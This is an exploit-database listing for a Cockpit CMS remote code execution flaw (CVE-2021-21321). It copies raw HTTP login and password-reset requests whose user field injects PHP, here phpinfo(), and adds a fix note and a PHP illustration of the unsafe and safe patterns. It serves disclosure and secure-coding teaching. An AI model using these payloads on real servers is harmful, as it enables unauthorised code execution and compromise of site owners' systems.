Cockpit CMS Remote Code Execution

CVE: CVE-2021-21321
Category: CWE-94
Price: $1000
Severity: Critical
Author: Unknown
Risk: Critical
Exploitation Type: Remote
Date: 2021-01-09
CVSS: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.246
EPSSP: 0.55569


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010085

Below is a copy:

# Cockpit CMS 0.6.1 - Remote Code Execution
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote
# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

# Exploit Login
  POST /auth/check HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 52
  Origin: https://example.com

  {"auth":{"user":"test'.phpinfo().'","password":"b"}}

# Exploit Password reset
  POST /auth/requestreset HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 28
  Origin: https://example.com

  {"user":"test'.phpinfo().'"}

## Impact
Allows an authenticated or unauthenticated remote attacker to execute arbitrary PHP code on the server hosting Cockpit, since the injected value is evaluated as PHP source rather than compared as data.

## Fix
Update to version 0.6.1 or later.
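The root cause behind the payloads above is a criteria function assembled from PHP source text with the user-supplied value spliced in, so a single quote in the value closes the string literal and the rest becomes code. The following PHP is an added illustration of that pattern and of the closure-based alternative; it is not Cockpit's code and the function names and document shape are assumptions. The unsafe builder only returns the source it would generate and never passes it to eval(), so the example can be run safely.

```php
<?php
// Added illustration (not Cockpit's own code): a criteria function built by
// concatenating user input into PHP source versus one that keeps the value
// as data. Function names and the document layout are assumptions.

declare(strict_types=1);

// Vulnerable pattern: the value is spliced into PHP source text. A value that
// contains a quote ends the string literal and appends arbitrary code.
// Only the generated source is returned here; it is never eval()ed.
function buildCriteriaSourceUnsafe(string $field, string $value): string
{
    return 'return function(array $doc) { return ($doc["' . $field . '"] ?? null) === \''
        . $value . '\'; };';
}

// Hardened pattern: no code generation at all. The value is captured by a
// closure and compared as a plain string, so quotes and parentheses carry
// no meaning.
function buildCriteriaSafe(string $field, string $value): Closure
{
    return static function (array $doc) use ($field, $value): bool {
        return ($doc[$field] ?? null) === $value;
    };
}

// Payload shape from the advisory above: breaks out of the quoted literal.
$payload = "test'.phpinfo().'";

echo "Generated source (unsafe builder):\n";
echo buildCriteriaSourceUnsafe('user', $payload), "\n\n";
// The output contains: === 'test'.phpinfo().''
// The quote in the payload closed the literal, and phpinfo() became part of
// the expression that would have been evaluated.

$matches = buildCriteriaSafe('user', $payload);
$users = [
    ['user' => 'alice'],      // constructed sample document
    ['user' => $payload],     // constructed sample document holding the payload
];
foreach ($users as $doc) {
    printf("%-25s => %s\n", $doc['user'], $matches($doc) ? 'match' : 'no match');
}
// The safe closure matches only the document whose user field is literally
// the payload string; nothing in the payload is interpreted as code.
```

Run with `php example.php`. The first block of output shows the injected `phpinfo()` sitting inside the generated source, which is exactly what the fixed version avoids: with a closure there is no source text to break out of, and the same payload is just an unusual username that matches nothing else.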

Copyright ©2024 Exploitalert.
